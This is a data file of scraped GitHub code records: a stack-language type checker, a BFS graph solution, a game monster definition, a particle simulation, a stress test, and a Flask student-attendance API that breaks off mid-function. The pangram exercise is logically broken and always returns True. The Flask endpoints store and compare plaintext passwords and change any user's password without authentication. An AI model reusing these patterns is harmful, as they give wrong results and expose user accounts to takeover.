stack[-1]\r\n check_stack(stack, [Ptr()])\r\n assert isinstance(ptr.typ, Struct),\\\r\n f\"can't access field of non-struct : {type_to_str(ptr.typ)}\"\r\n assert op.operand in (*ptr.typ.fields, *ptr.typ.methods),\\\r\n f\"field {op.operand} not found on {type_to_str(ptr.typ)}\"\r\n if op.operand in ptr.typ.fields:\r\n offset = 0\r\n for i, j in ptr.typ.fields.items():\r\n if i == op.operand:\r\n break\r\n offset += sizeof(j)\r\n stack.append(ptr.typ.fields[op.operand])\r\n return Op(OpType.PUSH_FIELD, offset, op.loc)\r\n else:\r\n method = ptr.typ.methods[op.operand]\r\n State.add_proc_use(method)\r\n check_stack(stack, method.in_stack.copy()[:-1])\r\n stack.extend(method.out_stack)\r\n return Op(OpType.CALL, method, op.loc)\r\n elif op.type == OpType.PUSH_FIELD_PTR:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n assert isinstance(ptr.typ, Struct),\\\r\n f\"can't access field of non-struct : {type_to_str(ptr.typ)}\"\r\n assert op.operand in ptr.typ.fields,\\\r\n f\"field {op.operand} not found on {type_to_str(ptr.typ)}\"\r\n offset = 0\r\n for i, j in ptr.typ.fields.items():\r\n if i == op.operand:\r\n break\r\n offset += sizeof(j)\r\n stack.append(Ptr(ptr.typ.fields[op.operand]))\r\n return Op(OpType.PUSH_FIELD_PTR, offset, op.loc)\r\n elif op.type == OpType.CALL_ADDR:\r\n assert len(stack) >= 1, \"The stack is too short\"\r\n predicate = stack.pop()\r\n assert isinstance(predicate, Addr), f\"Predicate must be an addr, but it's {type_to_str(predicate)}\"\r\n check_stack(stack, predicate.in_types.copy())\r\n stack.extend(predicate.out_types)\r\n return Op(OpType.CALL_ADDR, predicate)\r\n elif op.type in (OpType.INDEX, OpType.INDEX_PTR):\r\n assert len(stack) >= 1, \"stack is too short\"\r\n arr = stack[-1]\r\n if isinstance(arr, Ptr):\r\n if isinstance(arr.typ, Struct):\r\n if f\"__{op.type.name.lower()}__\" in arr.typ.methods:\r\n proc = arr.typ.methods[f\"__{op.type.name.lower()}__\"]\r\n 
State.add_proc_use(proc)\r\n check_stack(stack, proc.in_stack.copy())\r\n stack.extend(proc.out_stack)\r\n return [Op(OpType.CALL, proc, op.loc)]\r\n stack.pop()\r\n check_stack(stack, [Int(), Ptr(Array())])\r\n stack.append(arr.typ.typ if op.type == OpType.INDEX else Ptr(arr.typ.typ))\r\n if State.config.re_IOR:\r\n State.locs_to_include.append(op.loc)\r\n return Op(\r\n op.type,\r\n (sizeof(arr.typ.typ), arr.typ.len),\r\n loc=op.loc,\r\n loc_id=len(State.locs_to_include) - 1,\r\n )\r\n elif op.type == OpType.SIZEOF:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n _type = stack.pop()\r\n stack.append(Int())\r\n for i in range(op.operand):\r\n assert hasattr(_type, \"typ\"), f\"{type_to_str(_type)} has no type\"\r\n assert _type.typ is not None, f\"{type_to_str(_type)} has no type\"\r\n _type = _type.typ\r\n\r\n return Op(OpType.PUSH_INT, sizeof(_type))\r\n elif op.type == OpType.PUSH_TYPE:\r\n if isinstance(op.operand, Int):\r\n stack.append(Ptr(State.structures[\"Type\"]))\r\n elif isinstance(op.operand, Ptr):\r\n stack.append(Ptr(State.structures[\"PtrType\"]))\r\n elif isinstance(op.operand, Addr):\r\n stack.append(Ptr(State.structures[\"AddrType\"]))\r\n elif isinstance(op.operand, Array):\r\n stack.append(Ptr(State.structures[\"ArrayType\"]))\r\n elif op.type == OpType.SYSCALL:\r\n check_stack(stack, [None] * (op.operand + 1))\r\n stack.append(None)\r\n elif op.type == OpType.OPERATOR:\r\n return type_check_operator(op, stack)\r\n elif op.type in (OpType.AUTO_INIT, OpType.ASM):\r\n pass # These operations are a generation thing\r\n else:\r\n cont_assert(False, f\"unknown op type in type_check_op: {op.type.name}\")\r\n\r\n return None\r\n\r\n\r\ndef type_check_operator(op: Op, stack: List[Type]) -> Optional[Union[Op, List[Op]]]:\r\n cont_assert(len(Operator) == 20, \"Unimplemented operator in type_check_operator\")\r\n\r\n if op.operand in (\r\n Operator.ADD, Operator.SUB, Operator.MUL, Operator.GT, Operator.LT, \r\n Operator.EQ, Operator.LE, 
Operator.GE, Operator.NE,\r\n ):\r\n assert len(stack) >= 2, \"stack is too short\"\r\n type2 = stack.pop()\r\n type1 = stack.pop()\r\n if type1 == Int() and type2 == Int():\r\n stack.append(Int())\r\n elif type1 == Ptr() and type2 == Ptr():\r\n if isinstance(type1.typ, Struct):\r\n assert type1.typ is not None and type2.typ is not None,\\\r\n f\"incompatible types for {op.operand.name.lower()}\"\r\n assert type1.typ == type2.typ or type2.typ == type1.typ,\\\r\n f\"can't perform operation on different types: {type_to_str(type1.typ)} and {type_to_str(type2.typ)}\"\r\n assert f\"__{op.operand.name.lower()}__\" in type1.typ.methods,\\\r\n f\"method __{op.operand.name.lower()}__ not found on {type_to_str(type1.typ)}\"\r\n method = type1.typ.methods[f\"__{op.operand.name.lower()}__\"]\r\n stack.extend(method.out_stack)\r\n State.add_proc_use(method)\r\n return [\r\n Op(OpType.OPERATOR, Operator.SWAP, loc=op.loc),\r\n Op(OpType.CALL, method, loc=op.loc),\r\n ]\r\n else:\r\n State.throw_error(f\"can't perform an operation on {type_to_str(type1)} and {type_to_str(type2)}\")\r\n else:\r\n State.throw_error(f\"incompatible types for {op.operand.name.lower()}\")\r\n elif op.operand == Operator.DIV:\r\n assert len(stack) >= 2, \"stack is too short\"\r\n type2 = stack.pop()\r\n type1 = stack.pop()\r\n if type1 == Int() and type2 == Int():\r\n stack.extend([Int(), Int()])\r\n elif type1 == Ptr() and type2 == Ptr():\r\n if isinstance(type1.typ, Struct):\r\n assert type1.typ == type2.typ,\\\r\n f\"can't perform operation on different types: {type_to_str(type1.typ)} and {type_to_str(type2.typ)}\"\r\n assert f\"__div__\" in type1.typ.methods,\\\r\n f\"method __div__ was not found on {type_to_str(type1.typ)}\"\t\r\n method = type1.typ.methods[f\"__div__\"]\r\n stack.extend(method.out_stack)\r\n State.add_proc_use(method)\r\n return [\r\n Op(OpType.OPERATOR, Operator.SWAP, loc=op.loc),\r\n Op(OpType.CALL, method, loc=op.loc),\r\n ]\r\n else:\r\n State.throw_error(f\"incompatible types 
for div\")\r\n elif op.operand == Operator.DUP:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n stack.append(stack[-1])\r\n elif op.operand == Operator.DROP:\r\n check_stack(stack, [None])\r\n elif op.operand == Operator.SWAP:\r\n assert len(stack) >= 2, \"stack is too short\"\r\n stack[-2], stack[-1] = stack[-1], stack[-2]\r\n elif op.operand == Operator.ROT:\r\n assert len(stack) >= 3, \"stack is too short\"\r\n stack[-3], stack[-2], stack[-1] = stack[-1], stack[-2], stack[-3]\r\n elif op.operand == Operator.OVER:\r\n assert len(stack) >= 2, \"stack is too short\"\r\n stack.append(stack[-2])\r\n elif op.operand in (Operator.STORE, Operator.STRONG_STORE):\r\n assert len(stack) >= 1, \"stack is too short\"\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n if ptr.typ is None:\r\n check_stack(stack, [Int()], arg=1)\r\n elif isinstance(ptr.typ, Struct) and op.operand == Operator.STORE:\r\n check_stack(stack, [Ptr(ptr.typ)], arg=1)\r\n return Op(OpType.MOVE_STRUCT, sizeof(ptr.typ), State.loc)\r\n else:\r\n check_stack(stack, [ptr.typ], arg=1)\r\n if op.operand == Operator.STRONG_STORE:\r\n return Op(OpType.OPERATOR, Operator.STORE, op.loc)\r\n elif op.operand == Operator.STORE8:\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n check_stack(stack, [Int(), Ptr()])\r\n elif op.operand == Operator.LOAD:\r\n ptr = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n if ptr.typ is None:\r\n stack.append(Int())\r\n elif ptr.typ == Array():\r\n State.throw_error(\"can't unpack array to stack\")\r\n elif isinstance(ptr.typ, Struct):\r\n assert ptr.typ.is_unpackable, f\"can't unpack {type_to_str(ptr.typ)}\"\r\n stack.extend(ptr.typ.fields_types)\r\n return Op(OpType.UNPACK, sizeof(ptr.typ))\r\n else:\r\n stack.append(ptr.typ)\r\n elif op.operand == 
Operator.LOAD8:\r\n State.locs_to_include.append(op.loc)\r\n op.loc_id = len(State.locs_to_include) - 1\r\n check_stack(stack, [Ptr()])\r\n stack.append(Int())\r\n else:\r\n cont_assert(False, f\"Unimplemented operator in type_check_operator {op.operand.name}\")\r\n\r\n return None\r\n","repo_name":"farkon00/cont","sub_path":"type_checking/type_checking.py","file_name":"type_checking.py","file_ext":"py","file_size_in_byte":26147,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"18"} +{"seq_id":"1074585409","text":"# 완전탐색\n# 전력망을 둘로 나누기\n# 시간복잡도: O(N^2 + NE)\n# defaultdict에 대한 간단한 설명은 etc 폴더에 넣었습니다.\n\"\"\"\nsolution 함수 => O(N)입니다.\nvisited 리스트 초기화 => O(N)\n\ndefaultdict를 생성하는 데 걸리는 시간은 원소의 수에 비례합니다. 이 경우 원소의 수는 각 노드마다 연결된 간선의 개수를 나타내므로, wires 리스트에 있는 간선의 수에 비례합니다. 즉, defaultdict를 생성하는 데 필요한 시간 복잡도는 O(E)입니다.\n\nbfs 함수는 노드의 수 N에 비례하는 루프를 수행하며, 루프 내에서는 각 노드에 대해 연결된 노드를 모두 확인합니다. 이 때문에 bfs 함수의 시간 복잡도는 O(N + E)입니다.\n\ncnt_li 리스트에 대한 루프는 노드의 수 N에 비례합니다. 
각 노드에 대해 bfs 함수를 호출하므로, 이 루프의 시간 복잡도는 O(N^2 + NE)입니다.\n\nres 값을 업데이트 => O(1)입니다.\n\n따라서 solution 함수의 전체 시간 복잡도는 O(N^2 + NE)입니다.\n\n위 코드는 간선의 수가 적을 때는 효율적이지만, 간선의 수가 많을 경우에는 연산 비용이 많이 증가하므로, 큰 그래프에서는 느릴 수 있습니다.\n\"\"\"\n# wires는 길이가 n-1인 정수형 2차원 배열\nfrom collections import deque, defaultdict\n\ndef bfs(graph, start, visited):\n cnt = 1 # 시작한 노드는 연결된 노드가 1개로 시작됨\n d = deque([start])\n visited[start] = 1 \n while d:\n b = d.popleft()\n for i in graph[b]:\n if not visited[i]:\n d.append(i)\n visited[i] = 1\n cnt += 1\n return cnt\n\ndef solution(n, wires):\n wire = deque(wires) # 전선을 하나씩 끊어 탐색해야하므로 deque 사용\n res = n # n 변경하지 않기 위해\n for _ in range(len(wires)):\n a = wire.popleft()\n visited = [0] * (n+1)\n graph = defaultdict(list)\n cnt_li = [] # 전선을 끊어서 나온 전력망 두개의 각각 송전탑 개수 저장 리스트\n for v1, v2 in wire:\n graph[v1].append(v2)\n graph[v2].append(v1)\n for i in range(1, n+1):\n if not visited[i]:\n cnt_li.append(bfs(graph, i, visited))\n res = min(abs(cnt_li[0] - cnt_li[1]), res)\n wire.append(a) # 다른 전선 끊기 위해 끊었던 전선 다시 붙여줌\n return res","repo_name":"JiSuMun/Algorithm-Study","sub_path":"W06/JiSuMun/86971.py","file_name":"86971.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73198661161","text":"Bandit = genMonster(\"Bandit\", (129, 6080), \"a Bandit\")\nBandit.setOutfit(58, 59, 45, 114)\nBandit.setTargetChance(10)\nBandit.bloodType(\"blood\")\nBandit.setHealth(245)\nBandit.setExperience(65)\nBandit.setSpeed(180) # Correct\nBandit.walkAround(1,1,1) # energy, fire, poison\nBandit.setBehavior(summonable=450, hostile=1, illusionable=1, convinceable=450, pushable=1, pushItems=1, pushCreatures=0, targetDistance=1, runOnHealth=25)\nBandit.voices(\"Hand me your purse!\", \"Your money or your life!\")\nBandit.setImmunity(0,0,0) # paralyze, invisible, lifedrain\nBandit.setDefense(11, fire=1.0, earth=1.0, energy=1.0, ice=1.0, holy=1.0, death=1.05, physical=1.1, 
drown=1.0)\nBandit.regMelee(43)\nBandit.loot( (2148, 100, 27), (\"axe\", 31.75), (\"brass shield\", 18.0), (\"mace\", 10.75), (\"chain helmet\", 5.5), (\"leather legs\", 14.0), (\"brass armor\", 2.25), (\"tomato\", 10.5, 2), (\"iron helmet\", 0.5) )","repo_name":"novasdream/PyOT","sub_path":"data/monsters/Humans/Outlaws/Bandit.py","file_name":"Bandit.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"22382659062","text":"'''\r\nWrite a Python function to check whether a string is a pangram or not. Note: Pangrams\r\nare words or sentences containing every letter of the alphabet at least once. For\r\nexample: \"The quick brown fox jumps over the lazy dog\"\r\n'''\r\ndef pangram(str):\r\n a = ['a','b','c','d','e','f','g','h','i','j','k','l','m','o','n','p','q','r','s','t',' ','u','v','w','x','y','z']\r\n\r\n for i in a:\r\n if i not in a:\r\n return False\r\n return True\r\n\r\nprint(pangram(\"the quick brown fox jumps over the lazy dog\"))\r\nprint(pangram(\"Pack my box with five dozen liquor jugs\"))\r\nprint(pangram(\"hello\"))\r\n \r\n \r\n","repo_name":"krrishnagulati/assignment-6-ITC","sub_path":"ques4.py","file_name":"ques4.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14374036871","text":"import sys\r\nfrom math import ceil\r\nfrom random import randrange\r\nfrom numpy import array, dot, linalg\r\nimport time\r\nimport os\r\n\r\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\" # Hides information about pygame\r\nimport pygame as PG\r\n\r\n# Colors\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nGREY = (200, 200, 200)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\n\r\n\r\ndef run_simulation(ThreadID, WIDTH, HEIGHT, ParticleRadius, ParticleCount, PLAYBACK_SPEED, SIMTIME, FPS, windowed):\r\n # initialize Pygame\r\n 
PG.init()\r\n SIMTIMECONST = SIMTIME\r\n if windowed:\r\n # create window\r\n screen = PG.display.set_mode((WIDTH, HEIGHT), flags=PG.RESIZABLE)\r\n PG.display.set_caption(\"Collisions- \" + str(ParticleCount))\r\n PG.display.set_icon(PG.image.load(\"graphics/icon.png\"))\r\n # Assets\r\n CellImage = PG.image.load(\"graphics/blue_particle.png\").convert()\r\n RingImage = PG.image.load(\"graphics/red_particle.png\").convert()\r\n # create sprite groups\r\n all_sprites = PG.sprite.Group()\r\n all_particles = []\r\n\r\n # Classes\r\n class Particle(PG.sprite.Sprite):\r\n def __init__(self, x, y, radius, v):\r\n PG.sprite.Sprite.__init__(self)\r\n self.radius = radius\r\n self.image = PG.Surface((radius * 2, radius * 2))\r\n if windowed:\r\n self.image = PG.transform.scale(CellImage, (radius * 2, radius * 2))\r\n self.image.convert_alpha()\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = x\r\n self.rect.centery = y\r\n self.v = v\r\n self.move = array([0, 0])\r\n self.mass = 1\r\n\r\n def update(self):\r\n self.rect.centerx += int(self.v[0]) * PLAYBACK_SPEED\r\n self.rect.centery += int(self.v[1]) * PLAYBACK_SPEED\r\n if self.rect.right > WIDTH:\r\n self.rect.right = WIDTH\r\n self.v[0] = -self.v[0]\r\n self.collision(0)\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n self.v[0] = -self.v[0]\r\n self.collision(0)\r\n if self.rect.bottom > HEIGHT:\r\n self.rect.bottom = HEIGHT\r\n self.v[1] = -self.v[1]\r\n self.collision(0)\r\n if self.rect.top < 0:\r\n self.rect.top = 0\r\n self.v[1] = -self.v[1]\r\n self.collision(0)\r\n\r\n def collision(self, _):\r\n pass\r\n\r\n class RedParticle(Particle):\r\n def __init__(self, x, y, radius, v):\r\n Particle.__init__(self, x, y, radius, v)\r\n if windowed:\r\n self.image = PG.transform.scale(RingImage, (radius * 2, radius * 2))\r\n self.rect = self.image.get_rect()\r\n self.timer = time.time()\r\n self.collisions = self.distance = 0\r\n self.last_position = array([x, y])\r\n\r\n def collision(self, count):\r\n 
self.collisions += count\r\n position = array([self.rect.centerx, self.rect.centery])\r\n self.distance += linalg.norm(position - self.last_position)\r\n self.last_position = position\r\n\r\n # Functions\r\n def events():\r\n for event in PG.event.get():\r\n if event.type == PG.QUIT:\r\n sys.exit(0)\r\n\r\n def check_collisions():\r\n for s in range(len(all_particles)):\r\n for t in range(s + 1, len(all_particles)):\r\n source = all_particles[s]\r\n target = all_particles[t]\r\n min_distance = (source.radius + target.radius) ** 2\r\n distance = (source.rect.centerx - target.rect.centerx) ** 2 + (\r\n source.rect.centery - target.rect.centery) ** 2\r\n if distance <= min_distance: # if collision\r\n # source.move = target.move = array([0, 0])\r\n overlapping(source, target, distance ** 0.5)\r\n collision(source, target)\r\n target.collision(1)\r\n source.collision(1)\r\n\r\n def overlapping(source, target, distance):\r\n overlap = (source.radius + target.radius - distance) / 2.0\r\n n = array([target.rect.centerx - source.rect.centerx, target.rect.centery - source.rect.centery]) / distance\r\n source.rect.centerx -= ceil(overlap * n[0])\r\n target.rect.centerx += ceil(overlap * n[0])\r\n source.rect.centery -= ceil(overlap * n[1])\r\n target.rect.centery += ceil(overlap * n[1])\r\n\r\n def collision(source, target):\r\n normal = array([target.rect.centerx - source.rect.centerx, target.rect.centery - source.rect.centery])\r\n tangent = array([-normal[1], normal[0]])\r\n distance = linalg.norm(normal)\r\n n = normal / distance\r\n t = tangent / distance\r\n dst = dot(source.v, t)\r\n dtt = dot(target.v, t)\r\n dsn = dot(source.v, n)\r\n dtn = dot(target.v, n)\r\n if source.mass != target.mass:\r\n source.v = dst * t + (((source.mass - target.mass) * dsn + 2 * target.mass * dtn) /\r\n (source.mass + target.mass)) * n\r\n target.v = dtt * t + (((target.mass - source.mass) * dtn + 2 * source.mass * dsn) /\r\n (source.mass + target.mass)) * n\r\n else:\r\n source.v = dst 
* t + dtn * n\r\n target.v = dtt * t + dsn * n\r\n\r\n # Add red Particle\r\n red_par_init_speed = randrange(5, 10)\r\n m = RedParticle(0, 0, ParticleRadius,\r\n array([red_par_init_speed, red_par_init_speed]))\r\n all_sprites.add(m)\r\n all_particles.append(m)\r\n # Add random Particles\r\n for i in range(ParticleCount):\r\n m = Particle(randrange(WIDTH), randrange(HEIGHT), ParticleRadius,\r\n array([randrange(-10, 10), randrange(-10, 10)]))\r\n all_sprites.add(m)\r\n all_particles.append(m)\r\n\r\n # Game loop\r\n clock = PG.time.Clock()\r\n while SIMTIME > 0:\r\n SIMTIME -= 1\r\n events() # Process input (events)\r\n check_collisions() # physics\r\n all_sprites.update() # physics\r\n if windowed:\r\n screen.fill(GREY)\r\n all_sprites.draw(screen)\r\n PG.display.flip()\r\n clock.tick(FPS)\r\n PG.quit()\r\n # save Data\r\n file = open(f\"results/result{ParticleCount},{SIMTIMECONST}.txt\", \"a\")\r\n file.write(f\"{all_particles[0].collisions};{int(all_particles[0].distance)}\\n\")\r\n file.close()\r\n\r\n print(f\"Thread {ThreadID} done\")\r\n","repo_name":"KanarXD/Particle_Colisions","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12959446488","text":"\"\"\"\nCode to stress the low-level API as much as possible to expose\nany memory leaks or error handling issues.\n\"\"\"\nimport argparse\nimport os\nimport random\nimport resource\nimport sys\nimport time\nimport unittest\n\nimport tests.test_errors as test_errors\nimport tests.test_file_format as test_file_format\nimport tests.test_lowlevel as test_lowlevel\nimport tests.test_storage as test_storage\n\n\ndef main():\n modules = {\n \"errors\": test_errors,\n \"file_format\": test_file_format,\n \"file_storage\": test_storage,\n \"lowlevel\": test_lowlevel,\n }\n parser = argparse.ArgumentParser(\n description=\"Run tests in a loop to stress low-level 
interface\"\n )\n parser.add_argument(\n \"-m\",\n \"--module\",\n help=\"Run tests only on this module\",\n choices=list(modules.keys()),\n )\n args = parser.parse_args()\n test_modules = list(modules.values())\n if args.module is not None:\n test_modules = [modules[args.module]]\n\n print(\"iter\\ttests\\terr\\tfail\\tskip\\tRSS\\tmin\\tmax\\tmax@iter\")\n max_rss = 0\n max_rss_iter = 0\n min_rss = 1e100\n iteration = 0\n last_print = time.time()\n devnull = open(os.devnull, \"w\")\n while True:\n # We don't want any random variation in the amount of memory\n # used from test-to-test.\n random.seed(1)\n testloader = unittest.TestLoader()\n suite = testloader.loadTestsFromModule(test_modules[0])\n for mod in test_modules[1:]:\n suite.addTests(testloader.loadTestsFromModule(mod))\n runner = unittest.TextTestRunner(verbosity=0, stream=devnull)\n result = runner.run(suite)\n\n rusage = resource.getrusage(resource.RUSAGE_SELF)\n if max_rss < rusage.ru_maxrss:\n max_rss = rusage.ru_maxrss\n max_rss_iter = iteration\n if min_rss > rusage.ru_maxrss:\n min_rss = rusage.ru_maxrss\n\n # We don't want to flood stdout, so we rate-limit to 1 per second.\n if time.time() - last_print > 1:\n print(\n iteration,\n result.testsRun,\n len(result.failures),\n len(result.errors),\n len(result.skipped),\n rusage.ru_maxrss,\n min_rss,\n max_rss,\n max_rss_iter,\n sep=\"\\t\",\n end=\"\\r\",\n )\n last_print = time.time()\n sys.stdout.flush()\n\n iteration += 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tskit-dev/kastore","sub_path":"python/stress_lowlevel.py","file_name":"stress_lowlevel.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29805681783","text":"\"\"\"General purpose utilities to read files and write to files.\"\"\"\n\nfrom .encrypter import Encrypter\n\nfrom .file_io import (\n PathFilterFunction,\n InvalidFileError,\n is_dir,\n is_file,\n join,\n 
exists,\n get_file_base_name,\n create_file,\n remove_file,\n list_dir,\n create_directory,\n ensure_directory,\n write_to_binary_file,\n read_binary_file,\n)\n\nfrom .terminal_io import TerminalInterface, Format\n\n__all__ = [\n 'Encrypter',\n 'PathFilterFunction',\n 'is_dir',\n 'is_file',\n 'join',\n 'get_file_base_name',\n 'InvalidFileError',\n 'exists',\n 'create_file',\n 'remove_file',\n 'list_dir',\n 'create_directory',\n 'ensure_directory',\n 'write_to_binary_file',\n 'read_binary_file',\n 'TerminalInterface',\n 'Format',\n]\n","repo_name":"aureliencarle/cryptext","sub_path":"src/cryptext/io/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38153394763","text":"#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n\r\nfrom flask import Blueprint,session\r\nfrom flask import jsonify,request\r\nfrom flask_web import db\r\nfrom flask_web.databaseModel import Course,Teacher,USER,MENU,STUDENT,Course_Student,SignData,Course_Sign\r\nimport json\r\nimport time\r\nimport datetime\r\nimport sys\r\n \r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\nmod = Blueprint('app_student_op', __name__)\r\n\r\n@mod.route('/app/student/login_check', methods=['post'])\r\ndef login_check_student():\r\n username_password=request.get_data()\r\n username_password=json.loads(username_password)\r\n # print(username_password)\r\n # {u'password': u'123', u'id': u'123'}\r\n user=USER.query.filter_by(Loginname=str(username_password['id'])).first()\r\n if not user:\r\n return jsonify({'state':'0','error':''})\r\n user_json=user.to_json()\r\n user=json.loads(user_json)\r\n # print(user['roleid'])\r\n if not user['roleid']==3:\r\n return jsonify({'state':'0','error':''})\r\n if user['password']==username_password['password']:\r\n return jsonify({'state':'1','error':''})\r\n return jsonify({'state':'2','error':''})\r\n\r\n@mod.route('/app/student/', 
methods=['get'])\r\ndef get_name(StudentNumber):\r\n\t# print(StudentNumber)\r\n\tstudent=STUDENT.query.filter_by(StudentNumber = StudentNumber).first()\r\n\treturn jsonify({'personnel':{'Pname':student.Studentname,'ID':StudentNumber,'Studentid':student.Studentid}})\r\n\r\n@mod.route('/app/student_course/', methods=['get'])\r\ndef get_course(StudentNumber):\r\n return_data=[]\r\n # print(StudentNumber)\r\n student=STUDENT.query.filter_by(StudentNumber = StudentNumber).first()\r\n id=student.Studentid\r\n # print(id)\r\n course_ids=Course_Student.query.filter_by(Studentid=id).all()\r\n for course_id in course_ids:\r\n # print(course_id.CourseId)\r\n course_data=Course.query.filter_by(CourseId=int(course_id.CourseId)).first()\r\n course_data=course_data.to_json()\r\n course_data=json.loads(course_data)\r\n # print(course_data)\r\n a={'cnameAndID':{'courseID':course_data['CourseId'] }}\r\n a['cnameAndID']['courseName']=course_data['CourseName']\r\n # print(a)\r\n return_data.append(a)\r\n # print(return_data)\r\n return jsonify({'marks':return_data,'data':'','error':''})\r\n\r\n\r\n@mod.route('/app/course_shape/', methods=['get'])\r\ndef get_course_shape(CourseId):\r\n course_data=Course.query.filter_by(CourseId=int(CourseId)).first()\r\n return jsonify({'shape':course_data.Layout})\r\n\r\n\r\n@mod.route('/app/student/sign/', methods=['put'])\r\ndef sign_status():\r\n sign_data=request.get_data()\r\n sign_data=json.loads(sign_data)\r\n # {'Studentid': 2, 'position': '5*5', 'courseID': 1}\r\n sign_time=time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\r\n Sign=SignData.query.filter_by(CourseId=sign_data['courseID']).order_by(SignData.StartData.desc()).first()\r\n if not Sign:\r\n return jsonify({'status':'error','data':'','error':'老师未发起签到'})\r\n sign_id=Sign.SignId\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Studentid=sign_data['Studentid']).first()\r\n if student_sign.Status=='签到' or student_sign.Status=='迟到':\r\n 
return jsonify({'status':'error','data':'','error':'你已签到'})\r\n sign_start_time=Sign.StartData\r\n sign_start_time=datetime.datetime.strptime(sign_start_time,\"%Y-%m-%d %H:%M:%S\")\r\n sign_time=datetime.datetime.strptime(sign_time,\"%Y-%m-%d %H:%M:%S\")\r\n timeout=sign_time-sign_start_time\r\n seconds=timeout.seconds\r\n if seconds < 120 :\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Place=sign_data['position']).first()\r\n if student_sign:\r\n return jsonify({'status':'error','data':'','error':'该位置已经有人'})\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Studentid=sign_data['Studentid']).first()\r\n student_sign.SignData=sign_time\r\n student_sign.Status=\"签到\"\r\n student_sign.Place=sign_data['position']\r\n db.session.commit()\r\n return jsonify({'status':'success','data':'','error':''})\r\n elif seconds < 7200:\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Place=sign_data['position']).first()\r\n if student_sign:\r\n return jsonify({'status':'error','data':'','error':'该位置已经有人'})\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Studentid=sign_data['Studentid']).first()\r\n student_sign.SignData=sign_time\r\n student_sign.Status=\"迟到\"\r\n student_sign.Place=sign_data['position']\r\n db.session.commit()\r\n return jsonify({'status':'error','data':'','error':'签到成功,你已迟到'})\r\n else:\r\n return jsonify({'status':'error','data':'','error':'你迟到过久,记为旷课'})\r\n\r\n\r\n@mod.route('/app/student/change_pass', methods=['put'])\r\ndef change_pass():\r\n up_data=request.get_data()\r\n up_data=json.loads(up_data)\r\n user_data=USER.query.filter_by(Loginname=up_data['loginname']).first()\r\n user_data.password=up_data['password']\r\n db.session.commit()\r\n return jsonify({'status':'success','data':'','error':''})\r\n\r\n@mod.route('/app/student/kaoqin/', methods=['get'])\r\ndef get_kaoqin(studentid):\r\n 
return_data=[]\r\n course_ids=Course_Student.query.filter_by(Studentid=studentid).all()\r\n for course in course_ids:\r\n a={}\r\n course_id=course.CourseId\r\n course_data=Course.query.filter_by(CourseId=course_id).first()\r\n a['coursename']=course_data.CourseName\r\n a['ok']=0\r\n a['later']=0\r\n a['no']=0\r\n sign_datas=Course_Sign.query.filter_by(CourseId=course_id,Studentid=studentid).all()\r\n for sign in sign_datas:\r\n print(sign.get_Status())\r\n if sign.Status.decode(\"utf-8\") == \"签到\":\r\n a['ok']+=1\r\n if sign.Status.decode(\"utf-8\") == \"迟到\":\r\n a['later']+=1\r\n if sign.Status.decode(\"utf-8\") == \"旷课\":\r\n a['no']+=1\r\n return_data.append(a)\r\n return jsonify({'status':'success','data':return_data,'error':''})\r\n\r\n\r\n@mod.route('/app/student/nocourse/', methods=['get'])\r\ndef get_nocourse(studentid):\r\n courses=Course.query.all()\r\n return_data=[]\r\n for course in courses:\r\n course_id=course.CourseId\r\n data=Course_Student.query.filter_by(Studentid=studentid,CourseId=course_id).first()\r\n if not data:\r\n a={}\r\n a['coursename']=course.CourseName\r\n a['courseid']=course.CourseId\r\n teacher_id=course.TeachId\r\n teacher=Teacher.query.filter_by(TeachId = teacher_id).first()\r\n a['teachername']=teacher.TeachName\r\n a['CourseWeek']=course.CourseWeek\r\n a['CourseDay']=course.CourseDay\r\n a['CourseTime']=course.CourseTime\r\n a['CoursePlace']=course.CoursePlace\r\n return_data.append(a)\r\n return jsonify({'status':'success','data':return_data,'error':''})\r\n\r\n\r\n@mod.route('/app/student/add_course/', methods=['post'])\r\ndef add_course(courseid):\r\n add_data=request.get_data()\r\n add_data=json.loads(add_data)\r\n # {'studentid':studentid}\r\n # print(add_data)\r\n 